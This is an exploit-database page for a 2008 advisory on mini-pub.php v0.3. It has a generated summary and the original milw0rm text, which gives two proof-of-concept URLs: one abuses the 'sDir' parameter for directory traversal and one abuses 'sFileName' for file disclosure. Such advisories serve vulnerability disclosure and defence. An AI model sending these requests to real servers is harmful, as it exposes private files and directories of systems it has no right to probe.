header-logo
Suggest Exploit
vendor:
mini-pub
by:
Unknown
N/A
CVSS
HIGH
Local Directory Traversal, File Disclosure
22
CWE
Product Name: mini-pub
Affected Version From: v0.3
Affected Version To: v0.3
Patch Exists: NO
Related CWE:
CPE: a:unknown:mini-pub:0.3
Metasploit:
Other Scripts:
Platforms Tested:
2008

mini-pub.php <= v0.3 Local Directory Traversal / File Disclosure Vulnerabilities

The mini-pub.php script version 0.3 has vulnerabilities that allow local directory traversal and file disclosure. The vulnerability can be exploited by accessing specific URLs with parameters such as 'sDir' and 'sFileName'.

Mitigation:

Upgrade to a newer version of mini-pub.php or apply a patch provided by the vendor.
Source

Exploit-DB raw data:

 _____   ____   __   __     _       ____        ____    ____ 
|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |    
  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___ 
  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|
                                                            

mini-pub.php <= v0.3 Local Directory Traversal / File Disclosure Vulnerabilities
Script : http://mini-pub.sourceforge.net/
I- Local Directory Traversal
POC : /mini-pub.php-0.3/front-end/dir.php?sDir=C:\AppServ\MySQL

II- File Disclosure 
POC : /mini-pub.php-0.3/front-end/edit.php?sFileName=edit.php
        ____           _           _           __  __ 
       / ___|   ___   | |       __| |         |  \/  |
      | |  _   / _ \  | |      / _` |         | |\/| |
      | |_| | | (_) | | |___  | (_| |         | |  | |
       \____|  \___/  |_____|  \__,_|  _____  |_|  |_|
                                      |_____|         

# milw0rm.com [2008-10-12]